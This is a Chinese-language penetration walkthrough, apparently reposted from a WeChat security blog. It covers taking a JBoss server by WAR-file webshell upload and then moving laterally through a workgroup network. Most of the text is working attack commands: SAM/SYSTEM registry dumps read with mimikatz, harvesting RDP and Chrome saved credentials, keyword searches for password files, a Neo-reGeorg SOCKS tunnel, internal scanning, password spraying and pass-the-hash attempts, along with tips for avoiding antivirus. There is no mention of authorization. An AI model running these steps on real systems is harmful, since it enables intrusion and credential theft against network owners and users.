Jboss Get Webshell To 工作组渗透
Jboss获取Webshell
通过Jboss上传war包获取Webshell,进而攻击内网。
参考:http://anyun.org/a/seayxinxianquanboke/2017/0213/7867.html
潜在问题:
•上传Webshell时不知道Web路径?怎么办?访问:
/jmx-console/HtmlAdaptor?action=inspectMBean&name=JMImplementation%3Aservice%3DLoaderRepository%2Cname%3DDefault
上面图后来补的目标为windows, 后台可以上传war包获取Webshell, 也可以用利用Jboss漏洞工具获取。
工作组渗透
通过Webshell,进行内网工作组渗透。
信息搜集:
首先查看权限whoami
查看进程 tasklist /svc去在线网站进行比对,存在杀软,无法上传远控,也无法上传任何工具,mimikatz抓密码不行了,抓浏览器密码什么的都不行,只能用其他方法代替。(虽然不免杀,但是我们可以找其他方法代替,这可能是很多小白也会遇到的问题)
推荐三个在线对比进程的网站。
https://www.ddosi.org/av/1.phphttps://www.adminxe.com/CompareAV/index.phphttp://payloads.net/kill_software/
网络结构判断,收集都有哪些网段 ipconfig 查看很可惜没有域,常规工作组
Route print 查看路由是否有除了192.168.1.1别的网段
Netstat -an 查看都有哪些IP在连接webshell IP, 有可能看到不同网段
hosts文件:C:WindowsSystem32driversetchosts,是否绑定域名。
arp -a 可以看到一些内网的机器
Net session &Net use
查看下当前有没有连接有的话就发了。一般情况下是没有的,但是在域渗透的时候遇到过,可能是别的大佬在搞我捡漏了。
上面这些操作网对内网的网络已经有了一个大概的了解。接下来对一些敏感文件或者凭证进行搜集.
抓Hash 后期可以进行hash传递,如果抓到明文进行密码喷洒,由于没有免杀的mimikatz我才用,导出注册表这种形式。这种方式可以不用担心免杀。Procdump.exe+mimikatz也可以,但是有些杀软现在已经开始杀Procdump了。
在终端执行如下两句进行hash导出,下载到本地
reg save hklmsam c:WINDOWSTempsam.hivereg save hklmsystem c:WINDOWSTempsystem.hive
然后用mimikatz读取hash
mimikatz # Privilege::debugmimikatz # lsadump::sam /sam:sam.hive /system:system.hive
、
然后到cmd5.com进行破解
没有会员有点蛋疼。明文暂时没拿到。继续进行信息搜集
查看3389
cmdkey /list获取Credentials:
dir /a %userprofile%AppDataLocalMicrosoftdir /a %userprofile%AppDataLocalMicrosoftCredentials* //查看RDP凭证链接3389连接记录reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
IIS信息可以获取
IIS7、IIS8:
列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site列出网站物理路径:%systemroot%system32inetsrvappcmd.exe list vdir
或者使用mimikatz读取IIS7配置文件:
IIS6:
cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUM W3SVC/1/rootChorm信息
chrome浏览器默认的用户数据保存目录如下
用户数据目录:C:UsersxxAppDataLocalGoogleChromeUser DataDefault缓存目录:C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCache
各文件如下:
书签:C:UsersxxAppDataLocalGoogleChromeUser DataDefaultBookmarksCookie: C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCookies浏览历史:C:UsersxxAppDataLocalGoogleChromeUser DataDefaultHistory当前的session:C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCurrent Session账号密码:C:UsersxxAppDataLocalGoogleChromeUser DataDefaultLogin DataC:UsersxxAppDataLocalGoogleChromeUser DataProfileLogin Data
查看回收站: C:/$RECYCLE.BIN/ ,以上翻遍了没找到太多有用的信息
搜索敏感文件
dir /b /s *user*.*,pass.*,config.* //只搜集当前目录和子目录不要直接从c盘根目录找,那样文件会很多,建议从 User 目录下:(具体可以更具情况追加)
findstr 命令查找某个文件的某个字段
上面两条命令只是查找某个文件,那我们想要查找一个文件里有没有 user、pass 等字段内容,就可以使用这条命令
findstr /c:"user" /c:"pass" /si *.txt通过命令进行敏感文件搜索发现了tomcat的密码
搜集信息很重要不要上来就直接去扫描端口啊什么的,搞不好就被发现了
隧道搭建渗透:
由于没有任何免杀工具,我选择代理网络到本地进行渗透,搭建隧道FRP就别想了被杀。我选择web socks,使用Neo-reGeorg搭建,使用很简单上传对应的脚本jsp的,然后在本地执行python进行把流量代理到本地。
Python neoreg.py -k hacker -u http://127.0.0.1:18080/tunnel.jsp -p 2324Python neoreg.py -k 密码 -u URL -p 本地socks端口
这样web socks就搭建好了.
这时候需要使用proxifier进行配置socks代理
这样我们就可以在本地访问目标内网了。当然你也可以在kali下用proxychains进行代理,使用很简单后面会在msf部分进行简单讲解。
首先我做的是进行端口扫描。Fscan扫一下内网资产
Fscan -h 192.168.1.1/24 -socks5 127.0.0.1:2324开放了很多端口,还有两个弱口令
对这些IP对应的端口进行访问,发现192.168.1.221同样存在jboss直觉告诉我也可以上传webshell,可惜需要登录无法获取web目录,导致无法上传webshell,后来用第一个webshell的web路径进行上传成功,原来这俩机器的配置一样。
使用impack尝试hash注入其他win机器没有成功
Proxychain smbexec.py
使用kail的msf尝试ms17-010也没有成功。
使用获取到的3个密码喷洒,成功测试到tomcat密码也是192.168.1.222的mysql密码,通过查看可以发现一些IP和机器名。
后续就是反复前面几个步骤继续收集信息192.168.1.221,33,37机器上的的敏感信息。由于时间原因我就没有继续了,如果继续我相信是会拿到更多权限的,一篇入门文章希望对您有所帮助。
原文始发于微信公众号(安全帮Live):Jboss Get Webshell To 工作组渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论